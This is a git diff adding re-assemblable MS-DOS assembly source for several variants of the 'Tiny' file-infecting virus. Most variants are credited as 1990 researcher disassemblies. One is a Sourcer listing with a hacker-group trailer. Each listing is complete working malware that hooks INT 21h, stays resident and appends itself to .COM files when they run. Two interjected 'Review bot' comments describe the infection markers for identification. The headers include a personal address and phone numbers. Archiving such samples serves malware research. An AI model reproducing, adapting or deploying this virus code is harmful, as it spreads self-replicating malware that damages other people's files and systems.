Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov ax,int_21-first4+seg_60 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + + xchg ax,cx +vect_cpy: + xchg ax,cx + xchg ax,word ptr es:[di-(32-21)*4] + stosw + jcxz vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg ax,bx ; Save the file handle in BX + + call lseek1 + + mov ah,3F ; Read the first 4 bytes of the file + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. 
+ + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file + call lseek + + push ax ; Save file length + + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + call lseek1 ; Seek to the file beginning + + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +lseek1: + mov al,0 ; Lseek to file beginning +lseek: + mov ah,42 ; Lseek either to file beginning or to file end + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dh,6 ; Put 6 in DH and 4 in CL + mov cl,4 + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-156.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-156.asm new file mode 100644 index 00000000..89bcc473 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-156.asm 
@@ -0,0 +1,182 @@ + page ,132 + name TINY156 + title The 'Tiny' virus, version TINY-156 + .radix 16 + +; ͻ +; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 +; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 +; +; The 'Tiny' Virus, version TINY-156 +; Disassembled by Vesselin Bontchev, September 1990 +; +; Copyright (c) Vesselin Bontchev 1989, 1990 +; +; This listing is only to be made available to virus researchers +; or software writers on a need-to-know basis. +; ͼ + +; The disassembly has been tested by re-assembly using MASM 5.0. + +code segment + assume cs:code, ds:code + + org 100 + +seg_60 equ 600 +v_len equ v_end-first4 + +start: + jmp v_entry ; Jump to virus code + db 'M' ; Virus signature + mov ax,4C00 ; Program terminate + int 21 + +; The original first 4 bytes of the infected file: + +first4 db 0EBh, 2, 90, 90 + +v_entry: + mov si,0FF ; Determine the start addres of the virus body + add si,[si+2] + + mov di,offset start ; Put the addres of program start on the stack + push di ; Now a Near RET instruction will jump there + + push ax ; Save AX (to keep programs as DISKCOPY happy) + + movsw ; Restore the original first 4 bytes + movsw + + mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h) + xor cx,cx ; ES := 0 + mov es,cx + mov cl,v_len-2 ; CX := virus length + lodsw ; Check if virus is present in memory + scasw + je run ; Just run the program if so + +; Virus not in memory. 
Install it there: + + dec di ; Adjust DI + dec di + stosw ; Store the first word of the virus body + rep movsb ; Store the rest of the virus + + mov di,32*4 ; Old INT 21h handler will be moved to INT 32h + mov ax,int_21-first4+seg_60 + +; Move the INT 21h handler to INT 32h and +; install int_21 as new INT 21h handler: + + xchg ax,cx +vect_cpy: + xchg ax,cx + xchg ax,word ptr es:[di-(32-21)*4] + stosw + jcxz vect_cpy ; Loop until done + +run: + pop ax ; Restore AX + push ds ; ES := DS + pop es + +; Jump to program start via funny RET instruction: + + ret + +int_21: ; New INT 21h handler + cmp ax,4B00 ; EXEC function call? + jne end_21 ; Exit if not + + push ax ; Save registers used + push bx + push cx + push dx + push di + push ds + push es + + push cs ; ES := CS + pop es + + mov ax,3D02 ; Open the file for both reading and writting + int 32 + jc end_exec ; Exit on error + xchg ax,bx ; Save the file handle in BX + + mov al,0 + call lseek + + mov ah,3F ; Read the first 4 bytes of the file + mov di,dx ; Save first4 address in DI + push cs ; DS := CS + pop ds + int 32 ; Do it + +; Check whether the file is already infected or is an .EXE file. +; The former contains the character `M' in its 3rd byte and +; the latter contains it either in the 0th or in the 1st byte. 
+ + push di ; Save DI + mov al,'M' ; Look for `M' + repne scasb + pop di ; Restore DI + je close ; Exit if file not suitable for infection + + mov al,2 ; Seek to the end of file + call lseek + + push ax ; Save file length + + mov cl,v_len ; Length of virus body + mov ah,40 ; Append virus to file + int 32 ; Do it + + mov al,0 ; Seek to the file beginning + call lseek + + mov al,0E9 ; Near JMP opcode + stosb ; Form the first instruction of the file + pop ax ; Restore file length in AX + inc ax + stosw ; Form the JMP's opperand + mov al,'M' ; Add a `M' character to mark the file + stosb ; as infected + + mov ah,40 + int 32 ; Do it + +close: + mov ah,3E ; Close the file + int 32 + +end_exec: + pop es ; Restore used registers + pop ds + pop di + pop dx + pop cx + pop bx + pop ax + +; Exit through the original INT 21h handler: + +end_21: + jmp dword ptr cs:[32*4] + +lseek: + mov ah,42 ; Lseek either to file beginning or to file end + xor cx,cx + xor dx,dx + int 32 ; Do it + + mov dh,6 ; Put 6 in DH and 4 in CL + mov cl,4 + ret ; Done + +v_end equ $ ; End of virus body + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-158.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-158.asm new file mode 100644 index 00000000..5cb83f90 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tiny-158.asm 
@@ -0,0 +1,178 @@
+ page ,132
+ name TINY158
+ title The 'Tiny' virus, version TINY-158
+ .radix 16
+
+; ͻ
+; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51
+; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255
+;
+; The 'Tiny' Virus, version TINY-158
+; Disassembled by Vesselin Bontchev, July 1990
+;
+; Copyright (c) Vesselin Bontchev 1989, 1990
+;
+; This listing is only to be made available to virus researchers
+; or software writers on a need-to-know basis.
+; ͼ
+
+; The disassembly has been tested by re-assembly using MASM 5.0.
+
+code segment
+ assume cs:code, ds:code
+
+ org 100
+
+seg_60 equ 600
+v_len equ v_end-first4
+
+start:
+ jmp v_entry ; Jump to virus code
+ db 'M' ; Virus signature
+ mov ax,4C00 ; Program terminate
+ int 21
+
+; The original first 4 bytes of the infected file:
+
+first4 db 0EBh, 2, 90, 90
+
+v_entry:
+ mov si,0FF ; Determine the start addres of the virus body
+ add si,[si+2]
+
+ mov di,offset start ; Put the addres of program start on the stack
+ push di ; Now a Near RET instruction will jump there
+
+ push ax ; Save AX (to keep programs as DISKCOPY happy)
+
+ movsw ; Restore the original first 4 bytes
+ movsw
+
+ mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
+ xor cx,cx ; ES := 0
+ mov es,cx
+ mov cl,v_len-2 ; CX := virus length
+ lodsw ; Check if virus is present in memory
+ scasw
+ je run ; Just run the program if so
+
+; Virus not in memory. Install it there:
+
+ dec di ; Adjust DI
+ dec di
+ stosw ; Store the first word of the virus body
+ rep movsb ; Store the rest of the virus
+
+ mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
+ mov ax,int_21-first4+seg_60
+
+; Move the INT 21h handler to INT 32h and
+; install int_21 as new INT 21h handler:
+
+ xchg ax,cx
+vect_cpy:
+ xchg ax,cx
+ xchg ax,word ptr es:[di-(32-21)*4]
+ stosw
+ jcxz vect_cpy ; Loop until done
+
+run:
+ pop ax ; Restore AX
+ push ds ; ES := DS
+ pop es
+
+; Jump to program start via funny RET instruction:
+
+ ret
+
+int_21: ; New INT 21h handler
+ cmp ax,4B00 ; EXEC function call?
+ jne end_21 ; Exit if not
+
+ push ax ; Save registers used
+ push bx
+ push cx
+ push dx
+ push di
+ push ds
+ push es
+
+ push cs ; ES := CS
+ pop es
+
+ mov ax,3D02 ; Open the file for both reading and writting
+ int 32
+ jc end_exec ; Exit on error
+ xchg bx,ax ; Save the file handle in BX
+
+ mov ah,3F ; Read the first 4 bytes of the file
+ mov cx,4 ; 4 bytes to read
+ mov dx,seg_60 ; Put them in first4
+ mov di,dx ; Save first4 address in DI
+ push cs ; DS := CS
+ pop ds
+ int 32 ; Do it
+
+; Check whether the file is already infected or is an .EXE file.
+; The former contains the character `M' in its 3rd byte and
+; the latter contains it either in the 0th or in the 1st byte.
+
+ push di ; Save DI
+ mov al,'M' ; Look for `M'
+ repne scasb
+ pop di ; Restore DI
+ je close ; Exit if file not suitable for infection
+
+ mov ax,4202 ; Seek to the end of file
+ xor cx,cx
+ xor dx,dx
+ int 32 ; Do it
+
+ push ax ; Save file length
+
+ mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
+ mov cl,v_len ; Length of virus body
+ mov ah,40 ; Append virus to file
+ int 32 ; Do it
+
+ mov ax,4200 ; Seek to the file beginning
+ xor cx,cx
+ xor dx,dx
+ int 32 ; Do it
+
+ mov dx,di ; Point DX at first4
+ mov al,0E9 ; Near JMP opcode
+ stosb ; Form the first instruction of the file
+ pop ax ; Restore file length in AX
+ inc ax
+ stosw ; Form the JMP's opperand
+ mov al,'M' ; Add a `M' character to mark the file
+ stosb ; as infected
+
+ mov cl,4 ; Overwrite the first 4 bytes of the file
+ mov ah,40
+ int 32 ; Do it
+
+close:
+ mov ah,3E ; Close the file
+ int 32
+
+end_exec:
+ pop es ; Restore used registers
+ pop ds
+ pop di
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+
+; Exit through the original INT 21h handler:
+
+end_21:
+ jmp dword ptr cs:[32*4]
+
+v_end equ $ ; End of virus body
+
+code ends
+ end start
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-159.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-159.asm
new file mode 100644
index 00000000..c3550380
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tiny-159.asm
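Review bot: The header records provenance and the MASM re-assembly test but not the static markers that identify this sample, which is the documentation an archive reader needs most; the tiny-159, tiny-160, tiny-167 and tiny-198 hunks carry the same header and the same gap. The markers are all visible in the code: an infected .COM begins with a 3-byte near JMP (0E9h; a CALL, 0E8h, in the tiny-167 variant) followed by the byte 'M' at offset 3, the body is copied to 0000:0600h (seg_60) when it first runs, and the original INT 21h vector is moved to INT 32h while INT 21h is pointed into segment 60h. A comment block under the copyright box along the lines of `; Identification: 'M' at file offset 3; resident copy at 0000:0600h; INT 21h hooked, original vector relocated to INT 32h` would let an analyst or a scanner author recognise the family without re-reading the listing.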
@@ -0,0 +1,178 @@
+ page ,132
+ name TINY159
+ title The 'Tiny' virus, version TINY-159
+ .radix 16
+
+; ͻ
+; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51
+; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255
+;
+; The 'Tiny' Virus, version TINY-159
+; Disassembled by Vesselin Bontchev, July 1990
+;
+; Copyright (c) Vesselin Bontchev 1989, 1990
+;
+; This listing is only to be made available to virus researchers
+; or software writers on a need-to-know basis.
+; ͼ
+
+; The disassembly has been tested by re-assembly using MASM 5.0.
+
+code segment
+ assume cs:code, ds:code
+
+ org 100
+
+seg_60 equ 600
+v_len equ v_end-first4
+
+start:
+ jmp v_entry ; Jump to virus code
+ db 'M' ; Virus signature
+ mov ax,4C00 ; Program terminate
+ int 21
+
+; The original first 4 bytes of the infected file:
+
+first4 db 0EBh, 2, 90, 90
+
+v_entry:
+ mov si,0FF ; Determine the start addres of the virus body
+ add si,[si+2]
+
+ mov di,offset start ; Put the addres of program start on the stack
+ push di ; Now a Near RET instruction will jump there
+
+ push ax ; Save AX (to keep programs as DISKCOPY happy)
+
+ movsw ; Restore the original first 4 bytes
+ movsw
+
+ mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
+ xor cx,cx ; ES := 0
+ mov es,cx
+ mov cl,v_len-2 ; CX := virus length
+ lodsw ; Check if virus is present in memory
+ scasw
+ je run ; Just run the program if so
+
+; Virus not in memory. Install it there:
+
+ dec di ; Adjust DI
+ dec di
+ stosw ; Store the first word of the virus body
+ rep movsb ; Store the rest of the virus
+
+ mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
+ mov ax,int_21-first4+seg_60 ; Offset
+
+; Move the INT 21h handler to INT 32h and
+; install int_21 as new INT 21h handler:
+
+vect_cpy:
+ xchg ax,word ptr es:[di-(32-21)*4]
+ stosw
+ xchg ax,cx
+ test ax,ax
+ jz vect_cpy ; Loop until done
+
+run:
+ pop ax ; Restore AX
+ push ds ; ES := DS
+ pop es
+
+; Jump to program start via funny RET instruction:
+
+ ret
+
+int_21: ; New INT 21h handler
+ cmp ax,4B00 ; EXEC function call?
+ jne end_21 ; Exit if not
+
+ push ax ; Save registers used
+ push bx
+ push cx
+ push dx
+ push di
+ push ds
+ push es
+
+ push cs ; ES := CS
+ pop es
+
+ mov ax,3D02 ; Open the file for both reading and writting
+ int 32
+ jc end_exec ; Exit on error
+ xchg bx,ax ; Save the file handle in BX
+
+ mov ah,3F ; Read the first 4 bytes of the file
+ mov cx,4 ; 4 bytes to read
+ mov dx,seg_60 ; Put them in first4
+ mov di,dx ; Save first4 address in DI
+ push cs ; DS := CS
+ pop ds
+ int 32 ; Do it
+
+; Check whether the file is already infected or is an .EXE file.
+; The former contains the character `M' in its 3rd byte and
+; the latter contains it either in the 0th or in the 1st byte.
+
+ push di ; Save DI
+ mov al,'M' ; Look for `M'
+ repne scasb
+ pop di ; Restore DI
+ je close ; Exit if file not suitable for infection
+
+ mov ax,4202 ; Seek to the end of file
+ xor cx,cx
+ xor dx,dx
+ int 32 ; Do it
+
+ push ax ; Save file length
+
+ mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
+ mov cl,v_len ; Length of virus body
+ mov ah,40 ; Append virus to file
+ int 32 ; Do it
+
+ mov ax,4200 ; Seek to the file beginning
+ xor cx,cx
+ xor dx,dx
+ int 32 ; Do it
+
+ mov dx,di ; Point DX at first4
+ mov al,0E9 ; Near JMP opcode
+ stosb ; Form the first instruction of the file
+ pop ax ; Restore file length in AX
+ inc ax
+ stosw ; Form the JMP's opperand
+ mov al,'M' ; Add a `M' character to mark the file
+ stosb ; as infected
+
+ mov cl,4 ; Overwrite the first 4 bytes of the file
+ mov ah,40
+ int 32 ; Do it
+
+close:
+ mov ah,3E ; Close the file
+ int 32
+
+end_exec:
+ pop es ; Restore used registers
+ pop ds
+ pop di
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+
+; Exit through the original INT 21h handler:
+
+end_21:
+ jmp dword ptr cs:[32*4]
+
+v_end equ $ ; End of virus body
+
+code ends
+ end start
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-160.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-160.asm
new file mode 100644
index 00000000..fff98800
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tiny-160.asm
@@ -0,0 +1,178 @@
+ page ,132
+ name TINY160
+ title The 'Tiny' virus, version TINY-160
+ .radix 16
+
+; ͻ
+; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51
+; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255
+;
+; The 'Tiny' Virus, version TINY-160
+; Disassembled by Vesselin Bontchev, July 1990
+;
+; Copyright (c) Vesselin Bontchev 1989, 1990
+;
+; This listing is only to be made available to virus researchers
+; or software writers on a need-to-know basis.
+; ͼ
+
+; The disassembly has been tested by re-assembly using MASM 5.0.
+
+code segment
+ assume cs:code, ds:code
+
+ org 100
+
+seg_60 equ 600
+v_len equ v_end-first4
+
+start:
+ jmp v_entry ; Jump to virus code
+ db 'M' ; Virus signature
+ mov ax,4C00 ; Program terminate
+ int 21
+
+; The original first 4 bytes of the infected file:
+
+first4 db 0EBh, 2, 90, 90
+
+v_entry:
+ mov si,0FF ; Determine the start addres of the virus body
+ add si,[si+2]
+
+ mov di,offset start ; Put the addres of program start on the stack
+ push di ; Now a Near RET instruction will jump there
+
+ push ax ; Save AX (to keep programs as DISKCOPY happy)
+
+ movsw ; Restore the original first 4 bytes
+ movsw
+
+ mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
+ xor cx,cx ; ES := 0
+ mov es,cx
+ mov cl,v_len-2 ; CX := virus length
+ lodsw ; Check if virus is present in memory
+ scasw
+ je run ; Just run the program if so
+
+; Virus not in memory. Install it there:
+
+ dec di ; Adjust DI
+ dec di
+ stosw ; Store the first word of the virus body
+ rep movsb ; Store the rest of the virus
+
+ mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
+ mov cl,2 ; The vector is 2 words long
+ mov ax,int_21-first4+seg_60 ; Offset
+
+; Move the INT 21h handler to INT 32h and
+; install int_21 as new INT 21h handler:
+
+vect_cpy:
+ xchg ax,word ptr es:[di-(32-21)*4]
+ stosw
+ mov ax,es ; Segment
+ loop vect_cpy ; Loop until done
+
+run:
+ pop ax ; Restore AX
+ push ds ; ES := DS
+ pop es
+
+; Jump to program start via funny RET instruction:
+
+ ret
+
+int_21: ; New INT 21h handler
+ cmp ax,4B00 ; EXEC function call?
+ jne end_21 ; Exit if not
+
+ push ax ; Save registers used
+ push bx
+ push cx
+ push dx
+ push di
+ push ds
+ push es
+
+ push cs ; ES := CS
+ pop es
+
+ mov ax,3D02 ; Open the file for both reading and writting
+ int 32
+ jc end_exec ; Exit on error
+ xchg bx,ax ; Save the file handle in BX
+
+ mov ah,3F ; Read the first 4 bytes of the file
+ mov cx,4 ; 4 bytes to read
+ mov dx,seg_60 ; Put them in first4
+ mov di,dx ; Save first4 address in DI
+ push cs ; DS := CS
+ pop ds
+ int 32 ; Do it
+
+; Check whether the file is already infected or is an .EXE file.
+; The former contains the character `M' in its 3rd byte and
+; the latter contains it either in the 0th or in the 1st byte.
+
+ push di ; Save DI
+ mov al,'M' ; Look for `M'
+ repne scasb
+ pop di ; Restore DI
+ je close ; Exit if file not suitable for infection
+
+ mov ax,4202 ; Seek to the end of file
+ xor cx,cx
+ xor dx,dx
+ int 32 ; Do it
+
+ push ax ; Save file length
+
+ mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
+ mov cl,v_len ; Length of virus body
+ mov ah,40 ; Append virus to file
+ int 32 ; Do it
+
+ mov ax,4200 ; Seek to the file beginning
+ xor cx,cx
+ xor dx,dx
+ int 32 ; Do it
+
+ mov dx,di ; Point DX at first4
+ mov al,0E9 ; Near JMP opcode
+ stosb ; Form the first instruction of the file
+ pop ax ; Restore file length in AX
+ inc ax
+ stosw ; Form the JMP's opperand
+ mov al,'M' ; Add a `M' character to mark the file
+ stosb ; as infected
+
+ mov cl,4 ; Overwrite the first 4 bytes of the file
+ mov ah,40
+ int 32 ; Do it
+
+close:
+ mov ah,3E ; Close the file
+ int 32
+
+end_exec:
+ pop es ; Restore used registers
+ pop ds
+ pop di
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+
+; Exit through the original INT 21h handler:
+
+end_21:
+ jmp dword ptr cs:[32*4]
+
+v_end equ $ ; End of virus body
+
+code ends
+ end start
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-163.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-163.asm
new file mode 100644
index 00000000..9bc8b021
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tiny-163.asm
@@ -0,0 +1,126 @@
+
+PAGE 59,132
+
+;
+;
+; S
+;
+; Created: 4-Aug-90
+; Version:
+; Passes: 9 Analysis Options on: H
+;
+;
+;
+
+data_2e equ 1ABh ; (946E:01AB=0)
+
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+
+s proc far
+
+start:
+ jmp loc_1 ; (0108)
+ db 0CDh, 20h, 7, 8, 9
+loc_1:
+ call sub_1 ; (010B)
+
+s endp
+
+;
+; SUBROUTINE
+;
+
+sub_1 proc near
+ pop si
+ sub si,10Bh
+ mov bp,data_1[si] ; (946E:01A0=0)
+ add bp,103h
+ lea dx,[si+1A2h] ; Load effective addr
+ xor cx,cx ; Zero register
+ mov ah,4Eh ; 'N'
+loc_2:
+ int 21h ; DOS Services ah=function 4Eh
+ ; find 1st filenam match @ds:dx
+ jc loc_6 ; Jump if carry Set
+ mov dx,9Eh
+ mov ax,3D02h
+ int 21h ; DOS Services ah=function 3Dh
+ ; open file, al=mode,name@ds:dx
+ mov bx,ax
+ mov ah,3Fh ; '?'
+ lea dx,[si+1A8h] ; Load effective addr
+ mov di,dx
+ mov cx,3
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, cx=bytes, to ds:dx
+ cmp byte ptr [di],0E9h
+ je loc_4 ; Jump if equal
+loc_3:
+ mov ah,4Fh ; 'O'
+ jmp short loc_2 ; (0120)
+loc_4:
+ mov dx,[di+1]
+ mov data_1[si],dx ; (946E:01A0=0)
+ xor cx,cx ; Zero register
+ mov ax,4200h
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, cx,dx=offset
+ mov dx,di
+ mov cx,2
+ mov ah,3Fh ; '?'
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, cx=bytes, to ds:dx
+ cmp word ptr [di],807h
+ je loc_3 ; Jump if equal
+ xor dx,dx ; Zero register
+ xor cx,cx ; Zero register
+ mov ax,4202h
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, cx,dx=offset
+ cmp dx,0
+ jne loc_3 ; Jump if not equal
+ cmp ah,0FEh
+ jae loc_3 ; Jump if above or =
+ mov ds:data_2e[si],ax ; (946E:01AB=0)
+ mov ah,40h ; '@'
+ lea dx,[si+105h] ; Load effective addr
+ mov cx,0A3h
+ int 21h ; DOS Services ah=function 40h
+ ; write file cx=bytes, to ds:dx
+ jc loc_5 ; Jump if carry Set
+ mov ax,4200h
+ xor cx,cx ; Zero register
+ mov dx,1
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, cx,dx=offset
+ mov ah,40h ; '@'
+ lea dx,[si+1ABh] ; Load effective addr
+ mov cx,2
+ int 21h ; DOS Services ah=function 40h
+ ; write file cx=bytes, to ds:dx
+loc_5:
+ mov ah,3Eh ; '>'
+ int 21h ; DOS Services ah=function 3Eh
+ ; close file, bx=file handle
+loc_6:
+ jmp bp ;*Register jump
+data_1 dw 0 ; Data table (indexed access)
+ db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
+sub_1 endp
+
+
+seg_a ends
+
+
+
+ end start
+
+;
+; > and Remember Don't Forget to Call <
+; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <
+;
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-167.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-167.asm
new file mode 100644
index 00000000..3b392146
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tiny-167.asm
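Review bot: The listing has no header beyond the Sourcer banner, and its code is identical to the tiny.asm hunk later in this commit with only the trailing `; > ARRESTED DEVELOPMENT …` footer added, so a one-line note recording that duplication would save the next reader a diff. The recognisable data sits at the end of sub_1: `db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0` is the ASCIIZ search mask '*.COM' handed to the AH=4Eh find-first call, and `cmp word ptr [di],807h` is the already-infected test against the two bytes expected at the JMP target. Suggested header: `; Tiny (Sourcer listing) - same code as Virus.MSDOS.Unknown.tiny.asm plus a trailer; search mask '*.COM'; infection marker 07h 08h at the JMP target`.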
@@ -0,0 +1,177 @@
+ page ,132
+ name TINY167
+ title The 'Tiny' virus, version TINY-167
+ .radix 16
+
+; ͻ
+; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51
+; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255
+;
+; The 'Tiny' Virus, version TINY-167
+; Disassembled by Vesselin Bontchev, July 1990
+;
+; Copyright (c) Vesselin Bontchev 1989, 1990
+;
+; This listing is only to be made available to virus researchers
+; or software writers on a need-to-know basis.
+; ͼ
+
+; The disassembly has been tested by re-assembly using MASM 5.0.
+
+code segment
+ assume cs:code, ds:code
+
+ org 100
+
+seg_60 equ 600
+v_len equ v_end-first4
+
+start:
+ call v_entry ; Jump to virus code
+ db 'M' ; Virus signature
+ mov ax,4C00 ; Program terminate
+ int 21
+
+; The original first 4 bytes of the infected file:
+
+first4 db 0EBh, 2, 90, 90
+
+v_entry:
+ pop si ; Determine the start addres of the virus body
+ add si,[si-2]
+
+; Save the original first 4 bytes of the infected file on the stack:
+
+ push word ptr ds:[si-4]
+ push word ptr ds:[si-2]
+
+ push ax ; Save AX (to keep programs as DISKCOPY happy)
+
+ mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
+ xor cx,cx ; ES := 0
+ mov es,cx
+ mov cl,v_len-2 ; CX := virus length
+ lodsw ; Check if virus is present in memory
+ scasw
+ je run ; Just run the program if so
+
+; Virus not in memory. Install it there:
+
+ dec di ; Adjust DI
+ dec di
+ stosw ; Store the first word of the virus body
+ rep movsb ; Store the rest of the virus
+
+ mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
+ mov cl,2 ; The vector is 2 words long
+ mov ax,int_21-first4+seg_60 ; Offset
+
+; Move the INT 21h handler to INT 32h and
+; install int_21 as new INT 21h handler:
+
+vect_cpy:
+ xchg ax,word ptr es:[di-(32-21)*4]
+ stosw
+ mov ax,es ; Segment
+ loop vect_cpy ; Loop until done
+
+run:
+ mov di,offset start ; Point DI at program start
+ pop ax ; Restore AX
+ pop word ptr ds:[di+2] ; Restore the original first 4 bytes
+ pop word ptr ds:[di] ; of the file
+ push ds ; ES := DS
+ pop es
+ jmp di ; Go
+
+int_21: ; New INT 21h handler
+ cmp ax,4B00 ; EXEC function call?
+ jne end_21 ; Exit if not
+
+ push ax ; Save registers used
+ push bx
+ push cx
+ push dx
+ push di
+ push ds
+ push es
+
+ push cs ; ES := CS
+ pop es
+
+ mov ax,3D02 ; Open the file for both reading and writting
+ int 32
+ jc end_exec ; Exit on error
+ xchg bx,ax ; Save the file handle in BX
+
+ mov ah,3F ; Read the first 4 bytes of the file
+ mov cx,4 ; 4 bytes to read
+ mov dx,seg_60 ; Put them in first4
+ mov di,dx ; Save first4 address in DI
+ push cs ; DS := CS
+ pop ds
+ int 32 ; Do it
+
+; Check whether the file is already infected or is an .EXE file.
+; The former contains the character `M' in its 3rd byte and
+; the latter contains it either in the 0th or in the 1st byte.
+
+ push di ; Save DI
+ mov al,'M' ; Look for `M'
+ repne scasb
+ pop di ; Restore DI
+ je close ; Exit if file not suitable for infection
+
+ mov ax,4202 ; Seek to the end of file
+ xor cx,cx
+ xor dx,dx
+ int 32 ; Do it
+
+ push ax ; Save file length
+
+ mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
+ mov cl,v_len ; Length of virus body
+ mov ah,40 ; Append virus to file
+ int 32 ; Do it
+
+ mov ax,4200 ; Seek to the file beginning
+ xor cx,cx
+ xor dx,dx
+ int 32 ; Do it
+
+ mov dx,di ; Point DX at first4
+ mov al,0E8 ; Near CALL opcode
+ stosb ; Form the first instruction of the file
+ pop ax ; Restore file length in AX
+ inc ax
+ stosw ; Form the CALL's opperand
+ mov al,'M' ; Add a `M' character to mark the file
+ stosb ; as infected
+
+ mov cl,4 ; Overwrite the first 4 bytes of the file
+ mov ah,40
+ int 32 ; Do it
+
+close:
+ mov ah,3E ; Close the file
+ int 32
+
+end_exec:
+ pop es ; Restore used registers
+ pop ds
+ pop di
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+
+; Exit through the original INT 21h handler:
+
+end_21:
+ jmp dword ptr cs:[32*4]
+
+v_end equ $ ; End of virus body
+
+code ends
+ end start
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-198.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-198.asm
new file mode 100644
index 00000000..8d97a6c2
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tiny-198.asm
@@ -0,0 +1,199 @@
+ page ,132
+ name TINY198
+ title The 'Tiny' virus, version TINY-198
+ .radix 16
+
+; ͻ
+; Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51
+; Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255
+;
+; The 'Tiny' Virus, version TINY-198
+; Disassembled by Vesselin Bontchev, July 1990
+;
+; Copyright (c) Vesselin Bontchev 1989, 1990
+;
+; This listing is only to be made available to virus researchers
+; or software writers on a need-to-know basis.
+; ͼ
+
+; The disassembly has been tested by re-assembly using MASM 5.0.
+
+code segment
+ assume cs:code, ds:code
+
+ org 100
+
+seg_60 equ 600
+v_len equ v_end-v_entry
+
+start:
+ jmp v_entry ; Jump to virus code
+ db 'M' ; Virus signature
+ mov ax,4C00 ; Program terminate
+ int 21
+
